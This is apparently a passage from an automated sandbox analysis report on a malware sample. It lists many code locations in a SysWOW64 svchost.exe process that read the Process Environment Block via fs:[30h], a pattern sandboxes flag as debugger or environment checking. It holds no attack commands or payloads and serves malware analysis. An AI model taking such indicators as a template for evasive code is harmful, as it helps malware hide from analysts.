            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]1_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]1_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039601F8 mov eax, dword ptr fs:[00000030h]1_2_039601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov ecx, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F0115 mov eax, dword ptr fs:[00000030h]1_2_039F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960124 mov eax, dword ptr fs:[00000030h]1_2_03960124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C156 mov eax, dword ptr fs:[00000030h]1_2_0392C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C8158 mov eax, dword ptr fs:[00000030h]1_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04164 mov eax, dword ptr fs:[00000030h]1_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04164 mov eax, dword ptr fs:[00000030h]1_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]1_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]1_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov ecx, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393208A mov eax, dword ptr fs:[00000030h]1_2_0393208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F60B8 mov eax, dword ptr fs:[00000030h]1_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F60B8 mov ecx, dword ptr fs:[00000030h]1_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039280A0 mov eax, dword ptr fs:[00000030h]1_2_039280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C80A8 mov eax, dword ptr fs:[00000030h]1_2_039C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B20DE mov eax, dword ptr fs:[00000030h]1_2_039B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C0F0 mov eax, dword ptr fs:[00000030h]1_2_0392C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039720F0 mov ecx, dword ptr fs:[00000030h]1_2_039720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0392A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039380E9 mov eax, dword ptr fs:[00000030h]1_2_039380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60E0 mov eax, dword ptr fs:[00000030h]1_2_039B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4000 mov ecx, dword ptr fs:[00000030h]1_2_039B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6030 mov eax, dword ptr fs:[00000030h]1_2_039C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A020 mov eax, dword ptr fs:[00000030h]1_2_0392A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C020 mov eax, dword ptr fs:[00000030h]1_2_0392C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932050 mov eax, dword ptr fs:[00000030h]1_2_03932050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6050 mov eax, dword ptr fs:[00000030h]1_2_039B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395C073 mov eax, dword ptr fs:[00000030h]1_2_0395C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D678E mov eax, dword ptr fs:[00000030h]1_2_039D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039307AF mov eax, dword ptr fs:[00000030h]1_2_039307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E47A0 mov eax, dword ptr fs:[00000030h]1_2_039E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C7C0 mov eax, dword ptr fs:[00000030h]1_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B07C3 mov eax, dword ptr fs:[00000030h]1_2_039B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]1_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]1_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE7E1 mov eax, dword ptr fs:[00000030h]1_2_039BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930710 mov eax, dword ptr fs:[00000030h]1_2_03930710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960710 mov eax, dword ptr fs:[00000030h]1_2_03960710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C700 mov eax, dword ptr fs:[00000030h]1_2_0396C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov ecx, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC730 mov eax, dword ptr fs:[00000030h]1_2_039AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930750 mov eax, dword ptr fs:[00000030h]1_2_03930750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE75D mov eax, dword ptr fs:[00000030h]1_2_039BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4755 mov eax, dword ptr fs:[00000030h]1_2_039B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov esi, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938770 mov eax, dword ptr fs:[00000030h]1_2_03938770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039666B0 mov eax, dword ptr fs:[00000030h]1_2_039666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C6A6 mov eax, dword ptr fs:[00000030h]1_2_0396C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov eax, dword ptr fs:[00000030h]1_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972619 mov eax, dword ptr fs:[00000030h]1_2_03972619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE609 mov eax, dword ptr fs:[00000030h]1_2_039AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E627 mov eax, dword ptr fs:[00000030h]1_2_0394E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03966620 mov eax, dword ptr fs:[00000030h]1_2_03966620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968620 mov eax, dword ptr fs:[00000030h]1_2_03968620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393262C mov eax, dword ptr fs:[00000030h]1_2_0393262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C640 mov eax, dword ptr fs:[00000030h]1_2_0394C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962674 mov eax, dword ptr fs:[00000030h]1_2_03962674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E59C mov eax, dword ptr fs:[00000030h]1_2_0396E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov eax, dword ptr fs:[00000030h]1_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov ecx, dword ptr fs:[00000030h]1_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964588 mov eax, dword ptr fs:[00000030h]1_2_03964588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039365D0 mov eax, dword ptr fs:[00000030h]1_2_039365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039325E0 mov eax, dword ptr fs:[00000030h]1_2_039325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6500 mov eax, dword ptr fs:[00000030h]1_2_039C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039EA49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039644B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039364AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039304E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0392C427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039EA456 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0392645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]
